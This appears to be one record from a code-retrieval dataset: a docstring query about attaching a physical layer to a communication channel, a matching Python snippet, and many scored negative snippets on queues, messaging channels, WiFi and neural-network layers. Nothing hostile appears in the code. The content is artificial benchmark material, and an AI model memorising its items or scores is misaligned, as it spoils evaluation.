self.last_action] += self.alpha * (reward + self.gamma * self.q_table_2[new_state, np.argmax(self.q_table_1[new_state])] - self.q_table_1[self.last_state, self.last_action])\n else:\n self.q_table_2[self.last_state, self.last_action] += self.alpha * (reward + self.gamma * self.q_table_1[new_state, np.argmax(self.q_table_2[new_state])] - self.q_table_2[self.last_state, self.last_action])\n new_action = action_egreedy(np.mean([self.q_table_1[self.last_state],self.q_table_2[self.last_state]], axis=0), self.epsilon, self.action_size)\n \n else:\n raise ValueError('Learning algorithm not supported')\n \n #rollout state and action\n self.last_state = new_state\n self.last_action = new_action\n return new_action" ]
[ "0.7148608", "0.64981556", "0.63126504", "0.62986714", "0.62594926", "0.6258449", "0.61423904", "0.6026595", "0.60167265", "0.59709555", "0.5897679", "0.5888596", "0.58737326", "0.58079225", "0.58033264", "0.5781088", "0.5732777", "0.5710433", "0.57000035", "0.5699515", "0.5695676", "0.5652269", "0.5648659", "0.5643459", "0.5638543", "0.5613077", "0.55964935", "0.5576189", "0.555762", "0.5552006", "0.5541834", "0.5537452", "0.55301225", "0.5494151", "0.548778", "0.5433084", "0.54034096", "0.53815144", "0.5365881", "0.5342009", "0.5337422", "0.5332077", "0.53305286", "0.52868897", "0.5283162", "0.5275392", "0.52738607", "0.5263156", "0.5213331", "0.5208851", "0.52029425", "0.5197542", "0.5193976", "0.5165022", "0.5119767", "0.5104065", "0.50921494", "0.50917864", "0.50905246", "0.5076543", "0.50760096", "0.5073258", "0.5066211", "0.50596786", "0.50543314", "0.5044463", "0.50210625", "0.5015574", "0.5002526", "0.49966455", "0.4993492", "0.49920812", "0.49743044", "0.49743044", "0.4961347", "0.4960545", "0.4931127", "0.4928061", "0.49246886", "0.49178782", "0.49177587", "0.49153376", "0.49140078", "0.49071714", "0.49049428", "0.48991644", "0.4896857", "0.48930943", "0.4886131", "0.4883988", "0.4857254", "0.48544785", "0.48520705", "0.48408642", "0.48348117", "0.48292097", "0.4825361", "0.482286", "0.48188612", "0.48181337" ]
0.6940285
1
The channel does not maintain a queue. The phy/mac must do that.
def __init__(self, layer_delay=_default_layer_delay): self._attached_phys = [] self._layer_delay = layer_delay
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def tryToSend( self, channel, value ):\n if self.free:\n self.free = False\n self.writeToSerial( channel, value )\n elif len( self.queue ) > MAX_QUEUE_SIZE:\n raise DCBoxError( 2 )\n else: self.queue.append( ( channel, value ) )", "def on_queue_declared(frame):\n channel.basic_consume(handle_delivery, queue='test')", "def channel(self):\n raise NotImplementedError", "def test_queue():\n mq = IPCComm.get_queue()\n key = str(mq.key)\n assert(CommBase.is_registered('IPCComm', key))\n CommBase.unregister_comm('IPCComm', key, dont_close=True)\n nt.assert_raises(KeyError, IPCComm.remove_queue, mq)\n CommBase.register_comm('IPCComm', key, mq)\n IPCComm.remove_queue(mq)\n assert(not CommBase.is_registered('IPCComm', key))", "def on_channel_open(new_channel):\n global channel\n channel = new_channel\n channel.queue_declare(queue=\"test\", durable=True, exclusive=False, auto_delete=False, callback=on_queue_declared)", "def dequeue(self):\n pass", "def dequeue(self):\n pass", "def on_channel_open(self, new_channel):\n\t\tself.channel = new_channel\n\t\tself.declare_queue(self.on_queue_declared)", "def dequeue(self):", "def __init__(self):\r\n self.queue = []\r\n self.current = False", "def blank(self, channel):\n pass", "async def channel(self, ctx):\n pass", "def curr_queue(self):\n pass", "def testQueueMsg(self):\n self.mgr.isGoproBusy = True\n self.mgr.lastRequestSent = monotonic.monotonic()\n self.mgr.queueMsg(4)\n self.assertFalse( self.mgr.msgQueue.empty() )\n self.assertTrue(self.mgr.isGoproBusy)", "def get_queue(self):\r\n return _channeldata[self.chan].queue", "def __init__(self):\r\n self.queue = []", "def __init__(self):\r\n self.queue = []", "def __clear_message_queue(self):\r\n self.__lib.CC_ClearMessageQueue(self.__serno)", "def dispatch_frame(self, frame):\n if frame.command == 'RECEIPT':\n self.receipt_queue.put(frame)\n elif frame.command == 'MESSAGE':\n with self.subscription_lock:\n if frame.destination in self.subscribed_destinations:\n enqueue = True\n else:\n enqueue = False\n if self.debug:\n self.log.debug(\"Ignoring frame for unsubscribed destination: %s\" % frame)\n if enqueue:\n self.message_queue.put(frame)\n elif frame.command == 'ERROR':\n self.error_queue.put(frame)\n elif frame.command == 'CONNECTED':\n self.connected_queue.put(frame)\n else:\n self.log.info(\"Ignoring frame from server: %s\" % frame)", "def single_channel():\n return True", "def __init__(self): \n self.queue = []", "def __init__(self):\n self.queue = []", "def __init__(self):\n self.queue = []", "def __init__(self):\n self.queue = []", "def __init__(self):\n self.queue = []", "def __init__(self):\n self.queue = []", "def __init__(self):\n self._queue_items = []", "def send_msg(self, my_queue, my_msg):", "def bqm_move_queue(self):\n self.bqm.turn_once()", "def dequeue(self):\n raise NotImplementedError(\"dequeue: You should have implemented this method!\")", "def __init__(self):\n self.queue = Queue()", "def setup_queue(self):\n self.logger.info('declaring queue %s', self.queue)\n if self.otq:\n self._channel.queue_declare(self.on_queue_declareok, self.queue, auto_delete=True)\n else:\n self._channel.queue_declare(self.on_queue_declareok, self.queue)", "def on_queue_declared(frame):\n start_consuming(frame)", "def on_queue_declared(self, frame):\n\t\tself.channel.basic_qos(prefetch_count=1)\n\t\tself.channel.add_on_cancel_callback(self.on_consumer_cancelled)\n\t\tself.consumer_tag = self.channel.basic_consume(\n\t\t\tself.handle_delivery, \n\t\t\tframe.method.queue\n\t\t)", "def __init__(self):\n self.queues=[]", "def dummyF(self, arg, signal, sender):\n \n if self.isDead == True:\n return\n \n \n #print \"DUMMY\"\n if self.aborting:\n self.aborting = False\n self.isActive = False\n self.__orderQueue.popleft()\n del self.slaveTalk\n self.slaveTalk = None\n# self.__orderQueue.popleft()\n try:\n self.releaseLock()\n except:\n pass\n #print \"No lock, actually.\" \n dispatcher.send('SLAVE_PARSE_QUEUE', self, '')", "def queueOn() -> None:\n\t\tLogging.enableQueue = Logging.queueSize > 0", "def addchan(channel):", "def handle_post_frame(self, msg):\r\n self.in_queue -= 1", "def on_exchange_declareok(self, _unused_frame):\n self._channel_ctrl.queue_declare(\n '',\n exclusive=True,\n auto_delete=True,\n callback=self.on_queue_declareok\n )", "def ceilometer_amq(self):\n connection = pika.BlockingConnection(pika.ConnectionParameters(host=self.rabbit_host,\n credentials=pika.PlainCredentials(\n username=self.rabbit_user,\n password=self.rabbit_pass)))\n channel = connection.channel()\n result = channel.queue_declare(exclusive=True)\n queue_name = result.method.queue\n channel.exchange_declare(exchange='ceilometer', type='topic')\n channel.queue_bind(exchange='ceilometer', queue=queue_name, routing_key='notifications.#')\n channel.queue_bind(exchange='ceilometer', queue=queue_name, routing_key='metering')\n\n #channel.queue_bind(exchange='ceilometer.agent.notification_fanout', queue=queue_name)\n #channel.queue_bind(exchange='ceilometer.collector_fanout', queue=queue_name)\n channel.basic_consume(self.ceilometer_callback, queue=queue_name, no_ack=True)\n channel.start_consuming()", "def whenWriteReady(self, channel, call):", "def on_queue_clear_command(self, event):\n self.pre_check(event)\n self.same_channel_check(event)\n if self.get_player(event.guild.id).queue:\n self.get_player(event.guild.id).queue.clear()\n api_loop(event.channel.send_message, \"The queue has been cleared.\")\n else:\n api_loop(event.channel.send_message, \"The queue is already empty.\")", "def ctrlqueue_push(self) -> int:\n return self.dss_obj.CtrlQueueI(ctypes.c_int32(6), ctypes.c_int32(0))", "def __init__(self) -> None:\n self._queue = []", "def vendedorBehavior(queue):\n gr = register_message()", "def get_queue(self):\n if self.queue is not None:\n return self.queue\n state = self.get_state()\n self.queue = state.get_queue()\n # print(\"IQ\", self.queue)\n return self.queue", "def _get_queue(self):\n return self.__queue", "def _get_queue(self):\n return self.__queue", "def _get_queue(self):\n return self.__queue", "def _get_queue(self):\n return self.__queue", "def _get_queue(self):\n return self.__queue", "def _get_queue(self):\n return self.__queue", "def _get_queue(self):\n return self.__queue", "def _get_queue(self):\n return self.__queue", "def _get_queue(self):\n return self.__queue", "def _get_queue(self):\n return self.__queue", "def _get_queue(self):\n return self.__queue", "def _get_queue(self):\n return self.__queue", "def _get_queue(self):\n return self.__queue", "def _get_queue(self):\n return self.__queue", "def _get_queue(self):\n return self.__queue", "def test_tx_queue_emptying(self):\n\n self._serial_handler.tx_queue.put((0,'test'))\n\n # Should write the message and then empty the queue\n self._serial_handler._write()\n\n self.assertEquals(self._serial_handler.tx_queue.qsize(), 0)", "def on_open_channel(new_channel):\n # assign new channel to the global channel variable\n global channel\n channel = new_channel\n\n # channel is assigned and declare a queue named scripbox.\n # queue Properties - durable is True so that the queue withstands rabbitmq reboot\n # Pass a callback on_queue_declared which fires when a queue declaration\n # is successful\n channel.queue_declare(queue='scripbox', durable=True,\n auto_delete=False, callback=on_queue_declared)", "def reset(self):\n # Because it's a queue no need for reset..\n pass", "def reset(self):\n # Because it's a queue no need for reset..\n pass", "def reset(self):\n # Because it's a queue no need for reset..\n pass", "def add_to_queue(self, msg):\n if not self.queue.full():\n self.queue.put(msg)", "def test_ipc_queues():\n IPCComm.ipc_queues()", "async def declare(self) -> 'Queue':\n # we are relying to this in other functions\n self._channel = await self._backend.channel()\n self.log.debug(\"Channel acquired CHANNEL%i\",\n self._channel.channel_number)\n\n if self.exchange:\n await self.declare_exchange()\n\n if self.name is not None:\n await self.declare_queue()\n\n if self.exchange:\n await self.bind_queue()\n\n return self", "def testQueueSend(self):\n self.mgr.queueMsg(37)\n self.assertTrue( self.mgr.msgQueue.empty() )\n self.v.send_mavlink.assert_called_with(37)", "def put(self, connection):\n with self.lock:\n try:\n if connection.state == CHECKEDOUT:\n self.queue.put(connection)\n connection.state == POOLED \n except Full:\n connection.dispose()", "def discart(self):\n self.queue.clear()\n self.fetchable = 0", "def reset_queueing(self):\n self._num_queued = 0", "def testQueueisEmpty(self):\n self.mgr.isGoproBusy = True\n self.mgr.processMsgQueue()\n self.assertFalse( self.mgr.isGoproBusy )", "def declare_queue(self):\n\n self._channel.queue_declare(queue=self._queue_name, durable=True)\n print(\"Queue declared....\")", "def __init__(self):\n self.queue = deque()", "def __init__(self):\n self.queue = deque()", "def __init__(self):\n self.queue = deque()", "def __init__(self):\n self.queue = deque()", "def run(self): \n global frame\n #acquire the semaphore\n while True:\n time.sleep(2) \n self.s1.acquire() \n self.empty.acquire()\n #remove a table from the list\n frame += 1 \n print \"Producer1(%s):deliver frame, now frame:%s\\n\" %(self.name, frame) \n self.frame.release()\n #self.threadSemaphore.release() ", "def clear(self):\n self.queue = Queue()", "def workerThread1(self):\n while self.running:\n sleep(READ_DELAY)\n\n self.gui.do_terminal() \n\n #self.queue.put(self.gui.readSerialByte) # this didn't\n #self.gui.readSerialByte() # this works", "def setup_queue(self, channel, queue_name):\n logger.info('Declaring queue %s', queue_name)\n channel.queue_declare(queue = queue_name, \n durable = True,\n auto_delete = False)", "def testQueueFlushQueue(self):\n self.mgr.sendState = Mock()\n self.mgr.isGoproBusy = True\n self.mgr.lastRequestSent = monotonic.monotonic()\n self.mgr.queueMsg(1)\n self.mgr.queueMsg(2)\n self.assertEqual(self.mgr.msgQueue.qsize(), 2)\n self.mgr.lastRequestSent = monotonic.monotonic() - 3.0\n self.mgr.queueMsg(3)\n self.assertTrue(self.mgr.msgQueue.empty)\n self.mgr.sendState.assert_called_with()", "def channel(self, channel: int, /) -> \"TimerChannel\" | None:", "def __attrs_post_init__(self):\n self.state_changes_send_channel, self.state_changes_receive_channel = trio.open_memory_channel(\n math.inf\n )\n self._nursery = self._nursery_manager = None", "def __init__(self):\n self.dequeue = DeQueue()", "def on_shutdown(self):\n while self._queue:\n self._get()", "def __init__(self):\n Queue.__init__(self)", "def __init__(self):\n self.data = Queue()", "def setup_queue(self, method_frame):\n logger.info('Declaring queue %s', self.queue_name)\n # self._channel.queue_declare(self.on_queue_declareok, queue_name)\n\n self._channel.queue_declare(self.on_queue_declareok, exclusive=False, durable=True, queue=self.queue_name)", "def process_queued_msg(self):\n try:\n while not self.queue.empty():\n port, tbl = self.queue.get()\n reveived_port = self.switches[port.neighbor_switch_dpid].ports[port.neighbor_port_no]\n self.tbl.update_by_neighbor(reveived_port, port, tbl)\n self.deploy_routing_table()\n except:\n pass", "def fill_rawq(self):\n # The buffer size should be fairly small so as to avoid quadratic\n # behavior in process_rawq() above\n\n buf = self.channel.recv(50)\n self.msg(\"recv %r\", buf)\n self.eof = (not buf)\n self.rawq = self.rawq + buf", "def __producer__(self):\n import time\n i = 0\n while True:\n self.publish( i )\n i += 1\n time.sleep(1)", "def radioLoop(self, grid):\n commandInQueue = [0 , 0 , 0 , 0 , 0 , 0]\n q = Queue.Queue()\n while(1):\n # temp\n receivePipeNum = [-1]\n dataRx = []\n if self.radio.available(receivePipeNum):\n self.radio.read(dataRx, self.radio.getDynamicPayloadSize())\n string = \"\"\n print(\"Pipe Number: {}\".format(receivePipeNum))\n # for n in dataRx:\n # # Decode into standard unicode set\n # if (n >= 32 and n <= 126):\n # string += chr(n)\n # print(\"Out received message decodes to: {}\".format(string))\n print(\"Received: {}\".format(dataRx))\n statusByte = dataRx[9]\n print(\"status byte: {}\".format(dataRx[9]))\n# self.radio.print_status(self.radio.get_status())\n# ackPayload = [0x46 , 0x75 , 0x63 , 0x6B , 0x59 , 0x65 , 0x73]\n# self.radio.writeAckPayload(receivePipeNum[0] , ackPayload , 7)\n# self.radio.print_status(self.radio.get_status())\n\n \"\"\"\n add new bot: dataRx[0] & 0x1\n target found: dataRx[0] & 0x2\n requesting data: dataRx[0] & 0x4\n \"\"\"\n # Adding bot (addbot = 1)\n if statusByte & 0x01:\n # TODO(add exploregrid logic)\n # TODO: add in adding bot logic\n # self.addBot(grid, bot)\n print(\"adding bot {}\".format(receivePipeNum[0]))\n commandInQueue[receivePipeNum[0]] = 0\n\n # move request from a bot\n elif statusByte & 0x04:\n if commandInQueue[receivePipeNum[0]] == 0:\n #ack[0] = (0x80 + previousMoves[receivePipeNum[0]])\n #self.radio.writeAckPayload(receivePipeNum[0] , ack , 1)\n #previousMoves[receivePipeNum[0]] = previousMoves[receivePipeNum[0]] + 1\n command = []\n command.append(receivePipeNum[0])\n command.append(self.getBotCommand())\n q.put(command)\n #if not self.isTXQueueFull():\n # self.radio.writeAckPayload(receivePipeNum[0] , command , 1)\n\n\n commandInQueue[receivePipeNum[0]] = 1\n else:\n print(\"command for pipe {} already given\".format(receivePipeNum[0]))\n\n # Not requesting data (req = 0) update sensors\n\n elif statusByte & 0x08:\n # TODO: Add logic to check to see if the move failed\n self.sensors = [dataRx[0], dataRx[1],\n dataRx[2], dataRx[3],\n dataRx[4], dataRx[5],\n dataRx[6], dataRx[7],\n dataRx[8], receivePipeNum[0] + 1,\n statusByte]\n \"\"\"self.sensors = [ord(dataRx[0]), ord(dataRx[1]),\n ord(dataRx[2]), ord(dataRx[3]),\n ord(dataRx[4]), ord(dataRx[5]),\n ord(dataRx[6]), ord(dataRx[7]),\n ord(dataRx[8])]\n \"\"\"\n # Sent a data command, so the previous payload must have been received\n commandInQueue[receivePipeNum[0]] = 0\n print(self.sensors)\n\n # target found bit\n if statusByte & 0x02:\n self.targetFound = True\n print(\"TARGET FOUND\")\n\n if not self.isTXQueueFull():\n #q.empty():\n if not q.empty():\n print(commandInQueue)\n print(\"adding to queue\")\n ack = q.get()\n print(\"ACK {}\".format(ack))\n self.radio.writeAckPayload(ack[0] , ack[1:] , 1)\n time.sleep(.1)\n else:\n print(\"queue\")\n # TODO(add direction computation logic)\n else:\n print(\"fifo full\")\n print(\"\")\n\n\n \"\"\"\n unsure if necessary... clears pipes... add if necessary\n self.radio.stopListening()\n \"\"\"\n\n \"\"\"\n unsure if necessary... additional computation may be enough of\n delay... add if neccessary\n \"\"\"\n time.sleep(.1)", "def whenReadReady(self, channel, call):", "def send(self,msg):\n try:\n if self.mutexCmd.tryLock(100):\n self.cmd.append(msg)\n self.mutexCmd.unlock()\n #print(\"ADD TO QUEUE: {}\".format(msg))\n else:\n print(\"WARN: cmd not added to queue\")\n except Exception as e:\n print(\"ERROR:Serial:send:\",e)\n self.ConnexionError.emit(True)", "def subscribe(self, queue, action):\n self.channel.queue_declare(queue=queue)\n self.channel.basic_consume(queue=queue,\n on_message_callback=action,\n auto_ack=True)\n self.channel.start_consuming()", "def channel(self):\n\n self._channel = self._connection.channel()\n print(\"Channel opened...\")", "def tryToSend( self, message ):\n if self.free:\n self.free = False\n yield self.writeToSerial( message )\n elif len( self.queue ) > MAX_QUEUE_SIZE:\n raise Exception( 'Queue size exceeded')\n else: self.queue.append( message )" ]
[ "0.65623856", "0.6367049", "0.6290647", "0.62499535", "0.6225105", "0.6223285", "0.6223285", "0.61602104", "0.6132086", "0.61052483", "0.60849404", "0.60789603", "0.60609317", "0.6031437", "0.6011403", "0.59847355", "0.59847355", "0.59652287", "0.5922787", "0.59155333", "0.59132123", "0.58973587", "0.58973587", "0.58973587", "0.58973587", "0.58973587", "0.5892758", "0.5877724", "0.5872582", "0.58527017", "0.582323", "0.5822851", "0.5817696", "0.5814028", "0.58113426", "0.58042383", "0.5797605", "0.5767027", "0.5763322", "0.57617176", "0.57595634", "0.57563555", "0.57454425", "0.5738453", "0.57377297", "0.57184035", "0.571146", "0.5691053", "0.5691053", "0.5691053", "0.5691053", "0.5691053", "0.5691053", "0.5691053", "0.5691053", "0.5691053", "0.5691053", "0.5691053", "0.5691053", "0.5691053", "0.5691053", "0.5691053", "0.56899905", "0.56854194", "0.5665574", "0.5665574", "0.5665574", "0.56653494", "0.56421125", "0.5634902", "0.56341064", "0.56307125", "0.5621557", "0.5607545", "0.5603811", "0.560106", "0.5584715", "0.5584715", "0.5584715", "0.5584715", "0.55810493", "0.5570548", "0.5561497", "0.5559993", "0.5556218", "0.55490077", "0.5548892", "0.55318165", "0.5519555", "0.5516649", "0.5512671", "0.5510111", "0.5492797", "0.54852295", "0.5484013", "0.5483667", "0.5476943", "0.547472", "0.54721224", "0.54621166", "0.5458602" ]
0.0
-1
Attach the given phy layer to the chanel. After a short delay, the phy_layer should receive a `BusyIndication` or `IdleIndication` SDU
def attach(self, phy_layer): self._attached_phys.append(phy_layer)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def __init__(self, layer_delay=_default_layer_delay):\n self._attached_phys = []\n self._layer_delay = layer_delay", "def add_layer(self, layer: Union[CommandLayer, Type[CommandLayer]],\n active: Optional[bool] = True):\n if issubclass(layer, CommandLayer):\n layer = layer.load(self.character)\n if active or not any(l.active for l in self.command_layers):\n layer.active = True\n for other in self.command_layers:\n other.active = False\n\n self.command_layers.insert(0, layer)\n self._save()", "def wifi_on(self):\n self._clear_read_buffer()\n self._write_cmd(\"PE01\")\n time.sleep(100e-3)", "def connect(self):\n\n # Send some bogus UART characters to force a sleeping device to wake\n self._writeBytes(bytes([START1, START1, START1, START1]))\n time.sleep(0.1) # wait 100ms to give device time to start running\n\n self._rxThread.start()\n if not self.noProto: # Wait for the db download if using the protocol\n self._waitConnected()", "def on(self, include_ethernet=False):\n if not self.healthy:\n self.health_check()\n self._hub.switch_power.power_on(self.port_number)\n if self.secondary_port_number is not None:\n self._hub.switch_power.power_on(self.secondary_port_number)\n if include_ethernet:\n self.ethernet_on()\n time.sleep(5) # Small delay to give time for 'dev/tty' to populate\n switchboard = self._get_switchboard_if_initialized()\n if switchboard:\n switchboard.open_all_transports()", "def cycle(self, include_ethernet=False):\n if not self.healthy:\n self.health_check()\n self.off()\n time.sleep(2) # Small delay before calling power_on\n self.on()", "def connect_ap(self):\n\n # scan passively now that the AP has started\n self.host.scan_passive(200)\n \n # connect to AP\n self.host.sta_connect(self.ap1.macaddr)\n\n # expect a management frame for the AP\n mpdu = self.ap1.rx_mpdu(wifi.AIR_MGMT)\n \n # sanity checks\n assert(mpdu.typesubtype == wifi.fctl_probereq)\n assert(wifi.find_ie(mpdu.typesubtype, mpdu.bd, wifi.ie_ssid) == \"louis\")\n \n # send a probe response (optional if the join timeout is long enough)\n \n # expect an authentication request\n mpdu = self.ap1.rx_mpdu(wifi.AIR_MGMT)\n \n # sanity checks\n assert(mpdu.typesubtype == wifi.fctl_authentication)\n \n # send an authenticate response\n self.ap1.tx_msdu(da=self.host.macaddr, body=wifi.authenticate(), \n fctl=wifi.fctl_authentication)\n\n # expect an association request\n mpdu = self.ap1.rx_mpdu(wifi.AIR_MGMT)\n # sanity checks\n assert(mpdu.typesubtype == wifi.fctl_associationreq)\n \n # send an association response\n self.ap1.tx_msdu(da=self.host.macaddr, body=wifi.associationresponse(), \n fctl=wifi.fctl_associationresp)\n \n # expect a STA connection confirmation with a correct status\n assert(self.host.sta_connect_confirm() == True)", "def ethernet_on(self):\n if not self.healthy:\n self.health_check()\n if not self._ethernet_switch:\n raise errors.CapabilityNotReadyError(\n device_name=self._device_name,\n msg=\"Not set up for ethernet switching.\")\n self._ethernet_switch.switch_power.power_on(self.ethernet_port_number)", "def transmit(self) -> None:\n # Like RadioHead library, turn on high power boost if enabled.\n self.set_boost(_TEST_PA1_BOOST)\n # Enable packet sent interrupt for D0 line.\n self.dio_0_mapping = 0b00\n # Enter TX mode (will clear FIFO!).\n self.operation_mode = TX_MODE", "def add_layer(self, layer):\n self.__layers.append(layer)", "def set_next_layer(self, layer):\n self._next_layer = layer", "def add_layer(self, layer):\n idx = len(self.dict_topo)\n idx += 1\n self.dict_topo[idx] = layer", "def add(self, layer):\n self._top = layer(self._top)\n layer_name_ = layer.__class__.__name__\n layer_params_ = layer.params\n self._info.append((layer_name_, layer_params_))", "def init_wlan_sta():\n\n print('WLAN: STA mode')\n wlan.init(mode=WLAN.STA)\n if not wlan.isconnected():\n wlan.connect(WLAN_SSID, auth=WLAN_AUTH, timeout=5000)\n while not wlan.isconnected():\n machine.idle() # save power while waiting", "def layer(self, layer):\n self._layer = layer", "def switch_on(self, boot_timeout=None, settledown_duration=None,\n simple_switch_mode=False):\n raise DeviceException(DeviceException.FEATURE_NOT_IMPLEMENTED)", "def addLayer(self, layer):\n self.layers.append(layer)", "def setAdhocParameters(self, host, mode, **params):\n self.mode = mode\n latency = 10\n self.host = host\n #delay = 5 * distance\n try:\n options = dict( params )\n self.interface = options[ 'interface' ]\n except: \n self.interface = 'wlan0'\n \n bandwidth = wifiParameters.set_bw(mode)\n #self.host.cmd(host, \"tc qdisc replace dev %s-%s root netem rate %.2fmbit latency %.2fms delay %.2fms\" % (host, self.interface, rate, latency, delay)) \n self.host.cmd(\"tc qdisc add dev %s-%s root tbf rate %smbit latency %sms burst 1540\" % (str(host), self.interface, bandwidth, latency))", "def add_layer(self, layer: layers.Layer) -> layers.Layer:\n layer.events.select.connect(self._update_active_layer)\n layer.events.deselect.connect(self._update_active_layer)\n layer.events.status.connect(self._update_status)\n layer.events.help.connect(self._update_help)\n layer.events.interactive.connect(self._update_interactive)\n layer.events.cursor.connect(self._update_cursor)\n layer.events.cursor_size.connect(self._update_cursor_size)\n layer.events.data.connect(self._on_layers_change)\n layer.dims.events.ndisplay.connect(self._on_layers_change)\n layer.dims.events.order.connect(self._on_layers_change)\n layer.dims.events.range.connect(self._on_layers_change)\n self.layers.append(layer)\n self._update_layers(layers=[layer])\n\n if len(self.layers) == 1:\n self.reset_view()\n return layer", "def connect(self):\n self.sta_if = network.WLAN(network.STA_IF)\n self.sta_if.active(False)\n sleep(1)\n self.sta_if.active(True)\n\n dbg(\"Interface active\")\n if self.check_ap(self.ssid):\n # connect to access point\n if not self.sta_if.isconnected():\n dbg('connecting to AP...')\n self.sta_if.active(True)\n self.sta_if.connect(self.ssid, self.key)\n while not self.sta_if.isconnected():\n machine.idle()\n # Do we need a timeout here?\n dbg(self.sta_if.ifconfig())\n else:\n dbg(\"WLAN already connected\")\n dbg(self.sta_if.ifconfig())\n else:\n dbg(\"Target SSID not found.\")\n reset(\"Could not connect to network - target SSID is not availble.\", HARD)", "def feed(self, instruction):\n assert self.future_inst is None, 'BranchUnit fed when full'\n self.future_inst = instruction\n self.future_timer = max(0, instruction.DELAY - 1)", "def add_layer(self, layer):\n\n self._layers.append(layer)", "def setPhyDataTransmission(self, modeName, serviceName):\n self.phyDataTransmission[modeName] = serviceName", "def setPhyDataTransmission(self, modeName, serviceName):\n self.phyDataTransmission[modeName] = serviceName", "def connect(self):\n if self._btleSubThread is not None and threading.current_thread().ident != self._btleSubThread.ident:\n return # not allow\n self._peripheral.connect(self.car_mac, btle.ADDR_TYPE_RANDOM)\n self._readChar = self._peripheral.getCharacteristics(1, 0xFFFF, \"be15bee06186407e83810bd89c4d8df4\")[0]\n self._writeChar = self._peripheral.getCharacteristics(1, 0xFFFF, \"be15bee16186407e83810bd89c4d8df4\")[0]\n self._delegate.setHandle(self._readChar.getHandle())\n self._peripheral.setDelegate(self._delegate)\n self.turnOnSdkMode()\n self.enableNotify()\n self._connected = True\n self._reconnect = False\n if self._btleSubThread is None:\n self._transferExecution()", "def init_wlan_ap():\n\n print('WLAN: AP mode')\n wlan.init(mode=WLAN.AP,\n ssid='ttn-be-mapper',\n auth=(WLAN.WPA2, 'reppam-eb-ntt'),\n channel=7,\n antenna=WLAN.INT_ANT)", "def connectAdapter(self):\n self.canusb = pycanusb.CanUSB(bitrate='500')\n print('CanUSB: ',self.canusb)\n Msg = Switch_to_Operational_State_Msg()\n QTimer.singleShot(50,lambda msg = Msg : self.initialization(Msg))", "def enqueue(fun, timeout=200):\n\n GLib.idle_add(fun)", "def append(self, layer):\n self.layers.append(layer)", "def append_layer(self, *args, **kwargs) :\n \n self.insert_layer(len(self._layers), *args, **kwargs)", "def detach(self, phy_layer):\n self._attached_phys.remove(phy_layer)", "def tx_packet(self, packet):\r\n self.tx_cmd(packet.fctype, packet.nto, packet.narg1, packet.narg2, packet.smessage)", "def port_nic_add(switch, port, node, nic):\n client.port.connect_nic(switch, port, node, nic)", "def attach_yombo_device(self, yombo_device):\n logger.info(\"Attach yombo device to me.. {label}\", label=yombo_device.full_label)\n self.yombo_device = yombo_device\n self.yombo_device.wemo_device = self\n self.FEATURES = self.yombo_device.FEATURES\n self.update_value(self.state)", "def enable(self):\n self.fisica.open()\n self.rx.threadStart()\n self.tx.threadStart()", "def rx_beacon_packet(self): \n self.beacon.make_packet()\n rx_packet = self.beacon.tx_packet()\n rx_time = np.float128('%.20f'%(time.time()))\n if self.DEBUG:\n print 'rx_time: ', repr(rx_time)\n\n self.data.set_timestamp_base(rx_time)\n self.data.set_beacon_packet(rx_packet)", "def init_layer(layer, nonlinearity='leaky_relu'):\n nn.init.kaiming_uniform_(layer.weight, nonlinearity=nonlinearity)\n\n if hasattr(layer, 'bias'):\n if layer.bias is not None:\n layer.bias.data.fill_(0.)", "def associate(self, sta, ssid): \n self.host = sta\n self.host.cmd(\"iw dev %s-wlan0 connect %s\" % (sta, ssid))\n self.confirmInfraAssociation(self.host)", "def Set_Meas_Additional(self, mode, state, ch=1):\n self.write(f':MEAS{ch}:ADD {mode} {state}')", "def send_at_command(self, at_command, timeout, com_port):\n raise DeviceException(DeviceException.FEATURE_NOT_IMPLEMENTED)", "def tx_switch_channel(self,earfcn,bwMhz,powerdBm,ud_config=None,iterations=4,with_rx=False):\r\r\n\r\r\n self.meas_list = ['EVM']\r\r\n if earfcn >= 36000:\r\r\n self.setup_tdd(earfcn,bwMhz,powerdBm,ud_config,with_rx=with_rx)\r\r\n else:\r\r\n assert(ud_config is None)\r\r\n self.setup_fdd(earfcn,bwMhz,powerdBm,with_rx)\r\r\n\r\r\n tol_dB = 1\r\r\n\r\r\n earfcn_list = [earfcn, earfcn + 100] * iterations\r\r\n for current_earfcn in earfcn_list:\r\r\n _,freq_ul,freq_dl = lte_util.get_lte_ul_dl_freq_band(current_earfcn)\r\r\n self.modemObj.set_freqMHz(freqMHz=freq_ul)\r\r\n if with_rx:\r\r\n self.modemObj.set_freqMHz(direction='rx',freqMHz=freq_dl)\r\r\n\r\r\n self.instr.lte_tx.set_rf_freqMHz(freqMHz=freq_ul)\r\r\n\r\r\n self.GetTesterMeasurments(exp_powerdBm=powerdBm,\r\r\n tol_dB=tol_dB)", "def putLayer(self, layer):\t\n\t\t# force use different address id ( prevent use same defined layer more than once, eg: bottleneck in torchvision)\n\t\t# tmp_layer = copy.deepcopy(layer)\n\t\tlayer_id = id(layer)\n\t\tself.tmp_list.append(layer)\n\t\tlayer_id = id(self.tmp_list[-1])\n\t\tif layer_id in self.graph:\n\t\t\ttmp_layer = copy.deepcopy(layer)\n\t\t\tself.tmp_list.append(tmp_layer)\n\t\t\t# layer_id = id(self.tmp_list[-1])\n\t\t\tlayer_id = id(tmp_layer)\n\n\t\tself.graph[layer_id] = layer\n\t\tself.bottoms[layer_id] = [self.cur_id]\n\t\tself.cur_id = layer_id\n\t\t# del layer, tmp_layer, layer_id", "def activate():\n refresh()\n activate_connection_with_mainloop(get_uuid())", "def add_layer(self, layer):\n assert isinstance(layer, torch.nn.Module)\n setattr(self, 'layer'+str(self._layer_counter), layer)\n self._layer_counter += 1\n # layer indexing : layer 0 is closest to input", "def test_gatt_connect_in_quick_succession(self):\n gatt_server_cb = self.per_ad.droid.gattServerCreateGattServerCallback()\n gatt_server = self.per_ad.droid.gattServerOpenGattServer(\n gatt_server_cb)\n self.gatt_server_list.append(gatt_server)\n mac_address, adv_callback = get_mac_address_of_generic_advertisement(\n self.cen_ad, self.per_ad)\n autoconnect = False\n for i in range(1000):\n self.log.info(\"Starting connection iteration {}\".format(i + 1))\n try:\n bluetooth_gatt, gatt_callback = setup_gatt_connection(\n self.cen_ad, mac_address, autoconnect)\n except GattTestUtilsError as err:\n self.log.error(err)\n return False\n test_result = self._orchestrate_gatt_disconnection(bluetooth_gatt,\n gatt_callback)\n if not test_result:\n self.log.info(\"Failed to disconnect from peripheral device.\")\n 